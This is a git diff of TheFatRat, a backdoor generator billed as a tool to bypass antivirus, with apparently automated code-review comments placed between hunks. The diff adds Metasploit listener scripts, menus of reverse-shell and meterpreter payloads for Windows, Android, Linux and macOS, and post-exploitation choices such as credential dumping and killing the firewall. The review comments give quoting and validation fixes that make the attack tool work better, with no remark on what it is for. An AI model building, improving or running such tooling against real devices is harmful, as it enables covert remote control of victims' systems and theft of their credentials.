diff --git a/CHANGELOG.md b/CHANGELOG.md
index 1d40f73..805c46c 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,4 +1,5 @@
 ## CHANGELOG
+* v1.9.4 - Fatrat will be full terminal mode , Powerstage tool added , Setup script rebuilded
 * v1.9.3 - Added update script
 * v1.9.3 - Dex2Jar will be installed from now on from Fatrat setup manually on user system (reason: Kali repo still uses old version)
 * v1.9.3 - Updated Android build tools to V.26 RC1 & Android Platform V. 25-R03
diff --git a/README.md b/README.md
index 61d2465..cb90d2f 100644
--- a/README.md
+++ b/README.md
@@ -1,7 +1,7 @@
 # TheFatRat ( Unit for bypass av )
-## Update: Version 1.9.3
+## Update: Version 1.9.4
 ## Codename: Whistle
 [![Version](https://img.shields.io/badge/TheFatRat-1.9.3-brightgreen.svg?maxAge=259200)]()
@@ -138,7 +138,8 @@ Be sure to check out the [Changelog] and Read CHANGELOG.md
 - Dracos Linux from Scratch Indonesia ( Penetration os ) Thanksyou , you can see in http://dracos-linux.org/
 - Offensive Security for the awesome OS ( http://www.offensive-security.com/ )
 - peterpt
-- Dana James Traversie https://github.com/dana-at-cp/backdoor-apk
+- Dana James Traversie https://github.com/dana-at-cp/backdoor-apk
+- z0noxz (Powerstager) https://github.com/z0noxz/powerstager
 - http://www.kali.org/"
 - Jack Wilder admin in http://www.linuxsec.org
 - source for c program https://github.com/rsmudge
diff --git a/backdoor_apk b/backdoor_apk
index 3f098f4..3210e77 100755
--- a/backdoor_apk
+++ b/backdoor_apk
@@ -618,10 +618,33 @@ echo "Your RAT apk was successfully builded and signed , it is located here : rm -rf temp/* > /dev/null 2>&1 echo "" fi -zenity --question --text="`printf "Do you want to create a listener for this configuration \n to use in msfconsole in future ?"`" -if [ $? = 0 ] ; then -save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="myapk"); -svf=$path/config/listeners/$save.rc +echo -e $okegreen "Do you want to create a listener for this configuration" +echo -e $okegreen "to use in msfconsole in future ?" +echo "" +echo -ne $cyan "Choose y/n : " +read sel +case $sel in +y|Y|Yes|yes|YES) +echo "" +echo -e $green "Write the name for this config . (ex : myratapk)" +echo -ne "Filename : ";tput sgr0 +read fname +if [ -z $fname ] +then +svf=$path/config/listeners/myratapk.rc +rm -rf $svf >/dev/null 2>&1 +payloads=`sed -n 3p $apkconf` +yourip=`sed -n 4p $apkconf` +yourport=`sed -n 5p $apkconf` +echo "use exploit/multi/handler" > $svf +echo "set PAYLOAD $payloads" >> $svf +echo "set LHOST $yourip" >> $svf +echo "set LPORT $yourport" >> $svf +echo "exploit -j" >> $svf +echo -e $green "" +echo "Configuration file saved to $list/myratapk.rc" +else +svf=$path/config/listeners/$fname.rc rm -rf $svf >/dev/null 2>&1 payloads=`sed -n 3p $apkconf` yourip=`sed -n 4p $apkconf` @@ -632,5 +655,20 @@ echo "set LHOST $yourip" >> $svf echo "set LPORT $yourport" >> $svf echo "exploit -j" >> $svf echo -e $blue "" -echo "Configuration file saved to $list/$save.rc" +echo "Configuration file saved to $list/$fname.rc" fi +echo -e $green "" +read -rsp $'Press [ENTER] key to continue\n' -n 1 key +clear +;; +n|no|No|NO) +echo -e $green "" +read -rsp $'Press [ENTER] key to continue\n' -n 1 key +clear +;; +*) +echo -e $green "" +read -rsp $'Press [ENTER] key to continue\n' -n 1 key +clear +;; +esac diff --git a/fatrat b/fatrat index db4ccd9..a4ee177 100644 --- a/fatrat +++ b/fatrat 
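Review bot: The listener name read into `fname` is used unvalidated in `svf=$path/config/listeners/$fname.rc` and then handed to `rm -rf $svf`, so a value containing `/`, `..` or whitespace resolves outside the listeners directory or splits into several `rm` arguments; `[ -z $fname ]` is unquoted for the same reason. Restrict the name before using it, e.g. `[[ $fname =~ ^[A-Za-z0-9_.-]+$ ]] || fname=myratapk`, quote the path and drop `-r` since `svf` is a single file: `rm -f -- "$svf"`. With that, the default-name and named branches differ only in the value of `fname`, so `fname=${fname:-myratapk}` lets the two copies of the `.rc` writing block collapse into one. The `crlst` function added to `fatrat` in this commit repeats the same block and has the same issues. The `fi` closing this block and the `else` branch continue in the next hunk.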
@@ -46,7 +46,7 @@ fi
 #SAMARAN TAMPAN
 path=`pwd`
-Versi=1.9.3
+Versi=1.9.4
 codename=Whistle
 OS=`uname`
 # distro=$dist0
@@ -62,6 +62,7 @@ paycom='output/payload.c'
 pdfcom='output/pdf.c'
 bcom='output/Program.cs'
 pdfcom='output/pdf.c'
+pstager='tools/power.py'
 apachecom='output/apache_com.c'
 out='output/ip.txt'
 pump='tools/pump.py'
@@ -75,13 +76,14 @@ meterp="$path/temp/meterpreter.rc"
 outf="app_backdoor.apk"
 msploit=$path/logs/msploit.log
 lanip=`ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'`
+lanip6=`ip addr | grep 'state UP' -A4 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'`
 publicip=`dig +short myip.opendns.com @resolver1.opendns.com`
 hostn=`host $publicip | awk '{print $5}' | sed 's/.$//'`
 list=$path/config/listeners
 log=$path/logs/apk-old.log
 pwind=$path/logs/pwind.log
 defcon=$path/config/conf.def
-
+logfud=$path/logs/fudwin.log
 # spinner for Metasploit Generator
 spinlong () {
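Review bot: `lanip6` assumes the interface's IPv6 address sits exactly four lines after `state UP` in `ip addr` output, which holds for one particular address layout only; an interface with several IPv4 addresses, no IPv6 address, or a different iproute2 version yields an unrelated field or an empty string, and the variable is set unconditionally at script start. Asking iproute2 for the family directly is robust to layout: `lanip6=$(ip -o -6 addr show scope global | awk '{print $4}' | cut -d/ -f1 | head -n1)`. The existing `lanip` line has the same fragility and could use `ip -o -4 addr show scope global` the same way. `publicip`, `hostn` and now `lanip6` all run network commands at load time with no error handling, so an offline start fills them with empty strings silently.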
@@ -126,40 +128,66 @@ lp=`sed -n 2p $confd` echo "LHOST : $lh " echo "LPORT : $lp " echo "" -read -rsp $'Press any key go to options menu \n' -n 1 key -qt=$(zenity --list --radiolist --column "Select" --column "Action" TRUE "Change current config" FALSE "Delete configuration file" FALSE "Cancel" --text="Select one othe following options"); -case $qt in +read -rsp $'Press [ENTER] key go to options menu \n' -n 1 key +echo "" +echo -e $okegreen "Select one of the options bellow" +echo "" +echo -e $orange "+---------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow Change current config$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow Delete configuration file$orange |" +echo -e $orange "|$white [$okegreen 3$white ]$yellow Cancel$orange |" +echo -e $orange "+---------------------------------+" +echo "" +echo -ne $okegreen "Option : ";tput sgr0 +read con +echo "" +case $con in -"Change current config") +1) +confd=$path/config/conf.def rm -rf $confd touch $confd clear -val=$(zenity --forms --title="Config Defaults" --text="Change config" \ - --add-entry="LHOST : " \ - --add-entry="LPORT : ") -echo $val > temp/temp.tmp -tr "|" "\n" $confd -rm temp/temp.tmp +echo "" +echo -e $okegreen "Write Lhost value$yellow (ex: 192.168.1.1 or mydomain.com)" +echo -ne $okegreen "LHOST : ";tput sgr0 +read val +if [ -z $val ] +then +confdefault +else +echo $val > $confd +fi +echo "" +echo -e $okegreen "Write Lport value$yellow (Must be a port between 1 & 65535)" +echo -ne "LPORT : ";tput sgr0 +read val +if [ -z $val ] +then +confdefault +else +echo $val >> $confd +fi echo -e $okegreen "" -read -rsp $'Configuration changed , Restart fatrat . 
Press any key to exit fatrat \n' -n 1 key +read -rsp $'Configuration created , restart fatrat , Press [ENTER] key to exit fatrat \n' -n 1 key clear exit 0 ;; -"Delete configuration file") +2) clear echo -e $okegreen "" rm -rf $confd echo "Default configuration file was deleted , you will now have to input Lhost & Lport values manually in fatrat options ." echo "" -read -rsp $'Press any key to return to fatrat menu\n' -n 1 key +read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key clear menu ;; -"Cancel") +3) clear menu 
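Review bot: The LPORT prompt in option `1)` promises a 1–65535 range, but the value is appended to `$confd` with only an empty-string test, so a non-numeric or out-of-range entry is persisted and only fails later when the listener is started; `[ -z $val ]` is also unquoted, so an entry containing spaces makes `test` report too many arguments and the bad value is written anyway. Validate before writing: `[[ $val =~ ^[0-9]+$ ]] && (( val >= 1 && val <= 65535 )) || confdefault`. Both empty-input branches recurse into `confdefault` (presumably the function this hunk lives in) after `rm -rf $confd` and `touch $confd` have already run; that is harmless only because every recursive path ends in `exit 0`, and a `while` loop around each prompt would make the intent clearer than recursion. The enclosing function starts before this hunk.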
@@ -169,32 +197,56 @@ esac else echo -e $okegreen "" echo "No default configuration file detected " -read -rsp $'Press any key to go to options \n' -n 1 key -nc=$(zenity --list --radiolist --column "Select" --column "Action" TRUE "Create config" FALSE "Cancel" --text="Select one othe following options"); -case $nc in - -"Create config") +read -rsp $'Press [ENTER] key to go to options \n' -n 1 key +echo "" +clear +echo -e $okegreen "Select one of the options bellow" +echo "" +echo -e $orange "+---------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow Create config$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow Cancel$orange |" +echo -e $orange "+---------------------+" +echo "" +echo -ne $okegreen "Option : ";tput sgr0 +read con +echo "" +case $con in +1) confd=$path/config/conf.def touch $confd -val=$(zenity --forms --title="Config Defaults" --text="Create config" \ - --add-entry="LHOST : " \ - --add-entry="LPORT : ") - -echo $val > temp/temp.tmp -tr "|" "\n" $confd -rm temp/temp.tmp -clear +echo "" +echo -e $okegreen "Write Lhost value$yellow (ex: 192.168.1.1 or mydomain.com)" +echo -ne $okegreen "LHOST : ";tput sgr0 +read val +if [ -z $val ] +then +confdefault +else +echo $val > $confd +fi +echo "" +echo -e $okegreen "Write Lport value$yellow (Must be a port between 1 & 65535)" +echo -ne "LPORT : ";tput sgr0 +read val +if [ -z $val ] +then +confdefault +else +echo $val >> $confd +fi echo -e $okegreen "" -read -rsp $'Configuration created , restart fatrat , Press any key to exit fatrat \n' -n 1 key +read -rsp $'Configuration created , restart fatrat , Press [ENTER] key to exit fatrat \n' -n 1 key clear exit 0 - ;; - -"Cancel") +2) clear menu - +;; +*) +echo -e $red "" +read -rsp $ "Invalid Option" +confdefault ;; esac fi 
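Review bot: The new `*)` arm ends with `read -rsp $ "Invalid Option"`, which bash parses as prompt `$` and variable name `Invalid Option`; `read` rejects that as `not a valid identifier`, so the message is never shown and the arm drops straight into `confdefault`. Use the form the other arms use: `read -rsp $'Invalid option , press [ENTER] key to try again\n' -n 1 key`. The LHOST/LPORT prompt block in arm `1)` is a verbatim copy of the one in the previous hunk, including the unvalidated port value; a small helper that prompts for both values and writes `$confd` would keep the two copies in sync. The `if` this hunk closes with `fi` was opened before the hunk.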
@@ -228,6 +280,40 @@ fi echo -e $okegreen "" } +function selexe() { +echo "" + echo -e $okegreen "Enter the path to your EXE file .(ex: /root/downloads/myfile.exe)" + echo "" + echo -ne $cyan "Path : ";tput sgr0 + read exef +if [ ! -f $exef ] +then +echo "" +echo -e $red "File does not exist , make sure you write the right path of it ." +echo "" +echo -e $okegreen "Press [ENTER] key to try again ." +read cont +selexe +fi +} + +function selapk() { +echo "" + echo -e $okegreen "Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)" + echo "" + echo -ne $cyan "Path : ";tput sgr0 + read exef +if [ ! -f $exef ] +then +echo "" +echo -e $red "File does not exist , make sure you write the right path of it ." +echo "" +echo -e $okegreen "Press [ENTER] key to try again ." +read cont +selapk +fi +} + function invalid1 () { err=0 @@ -272,6 +358,7 @@ cat << ! | LHOST || The Listen Addres || $yourip | LPORT || The Listen Ports || $yourport | OUTPUTNAME || The Filename output || $fira + | PAYLOAD || Payload To Be Used || $payload +------------++-------------------------++-----------------------+ 
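Review bot: `if [ ! -f $exef ]` in both `selexe` and `selapk` leaves the path unquoted, so a path containing spaces makes `test` fail with too many arguments and the function re-prompts even for a file that exists; `read exef` without `-r` also strips backslashes from the input. Use `read -r exef` and `if [ ! -f "$exef" ]`. The two functions differ only in the prompt text, and each retries by calling itself, so a single helper taking the prompt as `$1` and looping with `while` instead of recursing would remove the duplicated block and the unbounded recursion. `read cont` stores the keypress in a variable named like the `cont` function this commit adds later in the file, which is legal but confusing; `key` is the name used elsewhere.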
@@ -289,12 +376,345 @@ cat << ! | LHOST || The Listen Addres || $yourip | LPORT || The Listen Ports || $yourport | OUTPUTNAME || The Filename output || $outf + | PAYLOAD || Payload To Be Used || $payload +------------++-------------------------++-----------------------+ ! } +function crlst() { +echo -e $okegreen "Do you want to create a listener for this configuration" +echo -e $okegreen "to use in msfconsole in future ?" +echo "" +echo -ne $cyan "Choose y/n : " +read sel +case $sel in +y|Y|Yes|yes|YES) +echo "" +echo -e $green "Write the name for this config . (ex : myratapk)" +echo -ne "Filename : ";tput sgr0 +read fname +if [ -z $fname ] +then +svf=$path/config/listeners/myratapk.rc +rm -rf $svf >/dev/null 2>&1 +echo "use exploit/multi/handler" > $svf +echo "set PAYLOAD $payload" >> $svf +echo "set LHOST $yourip" >> $svf +echo "set LPORT $yourport" >> $svf +echo "exploit -j" >> $svf +echo -e $okegreen "" +echo "Configuration file saved to $list/myratapk.rc" +else +svf=$path/config/listeners/$fname.rc +rm -rf $svf >/dev/null 2>&1 +echo "use exploit/multi/handler" > $svf +echo "set PAYLOAD $payload" >> $svf +echo "set LHOST $yourip" >> $svf +echo "set LPORT $yourport" >> $svf +echo "exploit -j" >> $svf +echo -e $okegreen "" +echo "Configuration file saved to $list/$fname.rc" +fi +echo -e $okegreen "" +read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key +echo +clear +menu +;; +n|no|No|NO) +echo -e $okegreen "" +read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key +echo +clear +menu +;; +*) +clear +menu +;; +esac +} + +function postexp() { +echo "" +echo -e $orange "+------------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow sysinfo.rc$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow fast_migrate.rc$orange |" +echo -e $orange "|$white [$okegreen 3$white ]$yellow cred_dump.rc$orange |" +echo -e $orange "|$white [$okegreen 4$white ]$yellow gather.rc$orange |" +echo -e $orange "|$white 
[$okegreen 5$white ]$yellow auto_migrate+killfirewall.rc$orange |" +echo -e $orange "+------------------------------------+" +echo "" +echo -ne $okegreen "Choose Post Exploitation Module : ";tput sgr0 +read pemd +case $pemd in +1) +pe="$path/postexploit/sysinfo.rc" +;; +2) +pe="$path/postexploit/fast_migrate.rc" +;; +3) +pe="$path/postexploit/cred_dump.rc" +;; +4) +pe="$path/postexploit/gather.rc" +;; +5) +pe="$path/postexploit/auto_migrate+killfirewall.rc" +;; +*) +postexp +;; +esac +} + +function pldbkf() { +echo "" +echo -e $orange "+--------------------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow cave_miner_inline$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow iat_reverse_tcp_inline$orange |" +echo -e $orange "|$white [$okegreen 3$white ]$yellow iat_reverse_tcp_inline_threaded$orange |" +echo -e $orange "|$white [$okegreen 4$white ]$yellow iat_reverse_tcp_stager_threaded$orange |" +echo -e $orange "|$white [$okegreen 5$white ]$yellow iat_user_supplied_shellcode_threaded$orange |" +echo -e $orange "|$white [$okegreen 6$white ]$yellow meterpreter_reverse_https_threaded$orange |" +echo -e $orange "|$white [$okegreen 7$white ]$yellow reverse_shell_tcp_inline$orange |" +echo -e $orange "|$white [$okegreen 8$white ]$yellow reverse_tcp_stager_threaded$orange |" +echo -e $orange "|$white [$okegreen 9$white ]$yellow user_supplied_shellcode_threaded$orange |" +echo -e $orange "+--------------------------------------------+" +echo "" +echo -ne $okegreen "Choose Payload : ";tput sgr0 +read pld +case $pld in +1) +payload="cave_miner_inline" +;; +2) +payload="iat_reverse_tcp_inline" +;; +3) +payload="iat_reverse_tcp_inline_threaded" +;; +4) +payload="iat_reverse_tcp_stager_threaded" +;; +5) +payload="iat_user_supplied_shellcode_threaded" +;; +6) +payload="meterpreter_reverse_https_threaded" +;; +7) +payload="reverse_shell_tcp_inline" +;; +8) +payload="reverse_tcp_stager_threaded" +;; +9) 
+payload="user_supplied_shellcode_threaded" +;; +*) +echo "" +echo -e $red "Wrong input , choose between 1 and 9" +pldbkf +;; +esac +} + +function pldlnx () { +echo "" +echo -e $orange "+-----------------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow linux/ppc/shell_reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow linux/x86/shell_reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 3$white ]$yellow linux/x86/meterpreter/reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 4$white ]$yellow osx/armle/shell_reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 5$white ]$yellow osx/ppc/shell_reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 6$white ]$yellow bsd/x86/shell/reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 7$white ]$yellow solaris/x86/shell_reverse_tcp$orange |" +echo -e $orange "+-----------------------------------------+" +echo "" +echo -ne $okegreen "Choose Payload : ";tput sgr0 +read pld +case $pld in +1) +payload="linux/ppc/shell_reverse_tcp" +;; +2) +payload="linux/x86/shell_reverse_tcp" +;; +3) +payload="linux/x86/meterpreter/reverse_tcp" +;; +4) +payload="osx/armle/shell_reverse_tcp" +;; +5) +payload="osx/ppc/shell_reverse_tcp" +;; +6) +payload="bsd/x86/shell/reverse_tcp" +;; +7) +payload="solaris/x86/shell_reverse_tcp" +;; +*) +echo "" +echo -e $red "Wrong input , choose between 1 and 7" +pldlnx +;; +esac +} + +function pldwin () { +echo "" +echo -e $orange "+-------------------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow windows/shell_bind_tcp$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow windows/shell/reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 3$white ]$yellow windows/meterpreter/reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 4$white ]$yellow windows/meterpreter/reverse_tcp_dns$orange |" +echo -e $orange "|$white [$okegreen 5$white ]$yellow 
windows/meterpreter/reverse_http$orange |" +echo -e $orange "|$white [$okegreen 6$white ]$yellow windows/meterpreter/reverse_https$orange |" +echo -e $orange "+-------------------------------------------+" +echo "" +echo -ne $okegreen "Choose Payload :";tput sgr0 +read pld +case $pld in +1) +payload="windows/shell_bind_tcp" +;; +2) +payload="windows/shell/reverse_tcp" +;; +3) +payload="windows/meterpreter/reverse_tcp" +;; +4) +payload="windows/meterpreter/reverse_tcp_dns" +;; +5) +payload="windows/meterpreter/reverse_http" +;; +6) +payload="windows/meterpreter/reverse_https" +;; +*) +echo "" +echo -e $red "Wrong input , choose between 1 and 6" +pldwin +;; +esac +} + +function pldand () { +echo "" +echo -e $orange "+-------------------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow android/meterpreter/reverse_http$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow android/meterpreter/reverse_https$orange |" +echo -e $orange "|$white [$okegreen 3$white ]$yellow android/meterpreter/reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 4$white ]$yellow android/shell/reverse_http$orange |" +echo -e $orange "|$white [$okegreen 5$white ]$yellow android/shell/reverse_https$orange |" +echo -e $orange "|$white [$okegreen 6$white ]$yellow android/shell/reverse_tcp$orange |" +echo -e $orange "+-------------------------------------------+" +echo "" +echo -ne $okegreen "Choose Payload : ";tput sgr0 +read pld +case $pld in +1) +payload="android/meterpreter/reverse_http" +;; +2) +payload="android/meterpreter/reverse_https" +;; +3) +payload="android/meterpreter/reverse_tcp" +;; +4) +payload="android/shell/reverse_http" +;; +5) +payload="android/shell/reverse_https" +;; +6) +payload="android/shell/reverse_tcp" +;; +*) +echo "" +echo -e $red "Wrong input , choose between 1 and 6" +pldand +;; +esac +} + +function pldmac() { +echo "" +echo -e $orange "+--------------------------------------+" +echo -e $orange "|$white [$okegreen 
1$white ]$yellow python/meterpreter/reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow generic/shell_reverse_tcp$orange |" +echo -e $orange "+--------------------------------------+" +echo "" +echo -ne $okegreen "Choose Payload : ";tput sgr0 +read pld +case $pld in +1) +payload="python/meterpreter/reverse_tcp" +;; +2) +payload="generic/shell_reverse_tcp" +;; +*) +echo "" +echo -e $red "Wrong input , choose between 1 and 2" +pldmac +;; +esac +} + +function pldmul() { +echo "" +echo -e $orange "+-----------------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow python/meterpreter/reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow linux/x86/shell_reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 3$white ]$yellow linux/x86/meterpreter/reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 4$white ]$yellow osx/armle/shell_reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 5$white ]$yellow osx/ppc/shell_reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 6$white ]$yellow bsd/x86/shell/reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 7$white ]$yellow solaris/x86/shell_reverse_tcp$orange |" +echo -e $orange "+-----------------------------------------+" +echo "" +echo -ne $okegreen "Choose Payload : ";tput sgr0 +read pld +case $pld in +1) +payload="python/meterpreter/reverse_tcp" +;; +2) +payload="linux/x86/shell_reverse_tcp" +;; +3) +payload="linux/x86/meterpreter/reverse_tcp" +;; +4) +payload="osx/armle/shell_reverse_tcp" +;; +5) +payload="osx/ppc/shell_reverse_tcp" +;; +6) +payload="bsd/x86/shell/reverse_tcp" +;; +7) +payload="solaris/x86/shell_reverse_tcp" +;; +*) +echo "" +echo -e $red "Wrong input , choose between 1 and 7" +pldand +;; +esac +} + #Microsploit log file msploitr () { 
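Review bot: The `*)` arm of `pldmul` calls `pldand` on bad input instead of re-entering `pldmul`, so a wrong choice in the multi-platform menu sends the user to the Android payload menu; change that line to `pldmul`. `postexp`'s `*)` arm re-prompts without printing anything, unlike every other menu in this hunk, which prints a `Wrong input` line first. The listener-writing code in `crlst` repeats the `backdoor_apk` block, with the same unquoted `[ -z $fname ]` and `rm -rf $svf` on a user-typed name; validating the name, then `fname=${fname:-myratapk}` followed by one write block, removes the duplication. Every arm of `crlst` ends by calling `menu`, so callers should not expect it to return; that deserves a comment at the top of the function.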
@@ -332,7 +752,7 @@ aapt=`sed -n 11p $file`
 apktool=`sed -n 12p $file`
 keytool=`sed -n 7p $file`
 sign=`sed -n 5p $file`
-
+dx=`sed -n 10p $file`
 else
 echo -e $red"Configuration file does not exists , run setup.sh first for config ."
 exit 1
@@ -353,8 +773,8 @@ clear
 echo -e $red"[*] (Ctrl + C ) Detected, Trying To Exit ..."
 sleep 1
 echo ""
-Stop
 echo -e $red"[*] Stop all service , Wait ..."
+Stop
 sleep 1
 echo ""
 echo -e $yellow"[*] Thank You For Using TheFatRat =)."
@@ -363,117 +783,106 @@ echo -e $yellow"[*] Check Dracos Linux LFS, Penetration OS From Indonesia =P." exit } - - -######################### -#CHECK DEPENDICIES -######################### -clear -echo -e $cyan" ____ _ _ _ " -echo " / ___| |__ ___ ___| | _(_)_ __ __ _ " -echo " | | | '_ \ / _ \/ __| |/ / | '_ \ / _\ | " -echo " | |___| | | | __/ (__| <| | | | | (_| | _ _ _ " -echo " \____|_| |_|\___|\___|_|\_\_|_| |_|\__/ | (_) (_) (_)" -echo " |___/ " -echo -e $lightgreen'-- -- +=[(c) 2016-2017 | dracos-linux.org | Linuxsec.org | Hacker Indonesia ' -echo -e $cyan'-- -- +=[ Author: Screetsec < Edo Maland > ]=+ -- -- ' -echo -e " " - -if [ $(id -u) != "0" ]; then - - echo -e $red [!]::[Check Dependencies] ; - sleep 1 - echo -e $red [✔]::[Check User]: $USER ; - echo -e $red [✔]::[Distro]: $distro ; - echo -e $red [✔]::[Release]: $rlname ; - sleep 1 - echo -e $red [x]::[not root]: you need to be [root] to run this script.; - echo "" - sleep 1 - exit - - -else - - echo -e $okegreen [!]::[Check Dependencies]: ; - sleep 1 - echo -e $okegreen [✔]::[Distro]: $distro ; - echo -e $okegreen [✔]::[Release]: $rlname ; - echo -e $okegreen [✔]::[Check User]: $USER ; - - -fi - - ping -c 1 google.com > /dev/null 2>&1 - if [ "$?" != 0 ] - +function chknet() { +echo -e $red "[X] Your Internet is not working correctly!" +sleep 0.5 +echo -e $cyan "[*] Checking ...." +ping -c 1 8.8.4.4 > /dev/null 2>&1 +png="$?" + if [ $png == "0" ] then - - echo -e $red [✔]::[Internet Connection]: OFFLINE!; - echo -e $red [x]::[warning]: This Script Needs An Active Internet Connection; - sleep 1 - -else - echo -e $okegreen [✔]::[Internet Connection]: connected!; - sleep 1 + echo -e $red "[X] Your linux OS is not able to resolve" + echo -e $red "hostnames over terminal using ping !!" + echo "" + echo -e $yellow "Search on the web : (unable to resolve hostnames ping) to find a solution" +echo "" +echo -e $okegreen "Fatrat will continue , but some of its functions may not work properly." 
+echo "" +echo -e $okegreen "Press [ENTER] key to continue" +read continue +cont + sleep 0.5 +elif [ $png == "1" ] +then + echo -e $yellow "You are connected to your local network but not to the web ." + echo -e $yellow "Check if your router/modem gateway is connected to the web ." +echo "" +echo -e $okegreen "Fatrat will continue , but some of its functions may not work properly." +echo "" +echo -e $okegreen "Press [ENTER] key to continue" +read continue +cont +sleep 0.5 +elif [ $png == "2" ] +then +echo -e $red "You are not connected to any network ." +echo "" +echo -e $okegreen "Fatrat will continue , but many of its functions will not work properly." +echo "" +echo -e $okegreen "Press [ENTER] key to continue" +read continue +cont + sleep 0.5 fi +} +cont() { # check apache if exists which apache2 > /dev/null 2>&1 if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Apache2 Server $distro ]: installation found!; + echo -e $okegreen [✔]::[Apache2 Server $distro ]: Installation found!; else echo -e $red [x]::[warning]:this script require apache2 to work ; echo "" echo -e $red [!]::Run setup.sh to install apache2 ; echo "" - sleep 1 + sleep 0.5 exit 1 fi -sleep 2 +sleep 0.5 # check if ruby exists which ruby > /dev/null 2>&1 if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Ruby]: installation found!; + echo -e $okegreen [✔]::[Ruby]: Installation found!; else echo -e $red [x]::[warning]:this script require ruby to work ; echo "" echo -e $red [!]::Run setup.sh to install ruby ; echo "" - sleep 1 + sleep 0.5 exit 1 fi -sleep 2 +sleep 0.5 # check if apktool exists which $apktool > /dev/null 2>&1 if [ "$?" 
-eq "0" ]; then - echo -e $okegreen [✔]::[Apktool]: installation found!; + echo -e $okegreen [✔]::[Apktool]: Installation found!; else echo -e $red [x]::[warning]:this script require apktool to work ; echo "" echo -e $red[!]::Run setup.sh to install apktool ; echo "" - sleep 1 + sleep 0.5 exit 1 fi -sleep 2 +sleep 0.5 # check if aapt exists which $aapt > /dev/null 2>&1 if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Aapt]: installation found!; + echo -e $okegreen [✔]::[Aapt]: Installation found!; else echo -e $red [x]::[warning]:this script require aapt to work ; echo "" echo -e $red [!]::Run setup.sh to install aapt ; echo "" - sleep 1 + sleep 0.5 exit 1 fi -sleep 2 +sleep 0.5 #another apache2 locate if [ "$distro" = "Ubuntu" ]; then 
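Review bot: `chknet` has no branch for ping exit statuses other than 0, 1 and 2, so when `ping` is missing (status 127) or returns any other code the function returns without calling `cont`, and the dependency checks that `cont` now wraps never run; an `else` arm that reports the status and calls `cont` (or exits) closes that gap. The 1-versus-2 mapping to "local network only" versus "no network" matches iputils ping but not every implementation, so the two messages should be worded as likely causes rather than certainties. Each branch calls `cont` before its trailing `sleep 0.5`, so that sleep only runs if `cont` returns, and the function prints `[X] Your Internet is not working correctly!` before any check has been made. `[ $png == "0" ]` works, but `[ "$png" -eq 0 ]` is the numeric comparison and tolerates an empty value.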
@@ -485,75 +894,59 @@ sleep 2 else apache2="/var/www/html" fi - +sleep 0.5 # check msfconsole which $msfconsole > /dev/null 2>&1 if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Msfconsole]: installation found!; + echo -e $okegreen [✔]::[Msfconsole]: Installation found!; else echo -e $red [x]::[warning]:this script require msfconsole installed to work ; echo "" echo -e $red [!]::Run setup.sh to install metasploit-framework ; - sleep 1 + sleep 0.5 exit 1 fi -sleep 2 +sleep 0.5 # check if msfvenom exists which $msfvenom > /dev/null 2>&1 if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Msfvenom]: installation found!; + echo -e $okegreen [✔]::[Msfvenom]: Installation found!; else echo -e $red [x]::[warning]:this script require msfvenom installed to work ; echo "" echo -e $red [!]::Run setup.sh to install metasploit-framework ; - sleep 1 + sleep 0.5 exit 1 fi -sleep 1 - -# check zenity if exists - which zenity > /dev/null 2>&1 - if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Zenity]: installation found!; - -else - - echo -e $red [x]::[warning]:this script require zenity installed to work ; - echo "" - echo -e $red [!]::Run setup.sh to install zenity ; - echo "" - sleep 1 - exit 1 -fi -sleep 2 +sleep 0.5 # check mingw if exists which i586-mingw32msvc-gcc > /dev/null 2>&1 if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Mingw32 OR 64]: installation found!; + echo -e $okegreen [✔]::[Mingw32]: Installation found!; COMPILER="i586-mingw32msvc-gcc" else which i686-w64-mingw32-gcc > /dev/null 2>&1 if [ $? 
